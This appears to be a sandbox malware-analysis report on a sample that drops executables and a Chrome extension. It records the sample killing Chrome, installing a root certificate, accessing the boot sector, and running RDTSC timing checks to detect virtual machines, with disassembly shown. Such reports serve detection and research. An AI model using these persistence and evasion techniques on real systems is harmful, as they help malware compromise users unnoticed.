Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32

Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: N1yprTBBXs.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: N1yprTBBXs.exe

Static file information: File size 4999496 > 1048576

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll

Source: N1yprTBBXs.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11fe00

Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: N1yprTBBXs.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: N1yprTBBXs.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: N1yprTBBXs.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source:	Binary string: atl71.pdbT source: atl71.dll.2.dr
Source:	Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source:	Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source:	Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source:	Binary string: atl71.pdb source: atl71.dll.2.dr
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source:	Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source:	Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source:	Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source:	Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source:	Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source:	Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source:	Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source:	Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr

Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N1yprTBBXs.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Unpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Unpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary,

Source: N1yprTBBXs.exe	Static PE information: real checksum: 0x195ad2 should be: 0x4cf583
Source: MSI1983.tmp.1.dr	Static PE information: real checksum: 0x0 should be: 0x2d22
Source: 6272167835D47591.exe.0.dr	Static PE information: real checksum: 0x195ad2 should be: 0x4cf583

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F001D push esp; ret
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004620E0 push ecx; mov dword ptr [esp], 00000000h
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F01A7 push esp; ret
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00406260 push ecx; mov dword ptr [esp], 00000000h
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F6375 push ecx; ret
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F47DA push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B13FB5 push ecx; ret

Persistence and Installation Behavior:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Installs new ROOT certificates

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI1983.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Roaming\1611970727133.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\icon48.png	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.html	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\background.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\book.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\jquery-1.8.3.min.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\popup.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\eklhijcdkfafgjlcdgmbboagmpekiefg\1.0.0.0_0\manifest.json	Jump to behavior

Boot Survival:

Contains functionality to infect the boot sector

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Windows\SysWOW64\msiexec.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_100204C0

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C729h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C38C889h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C680h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
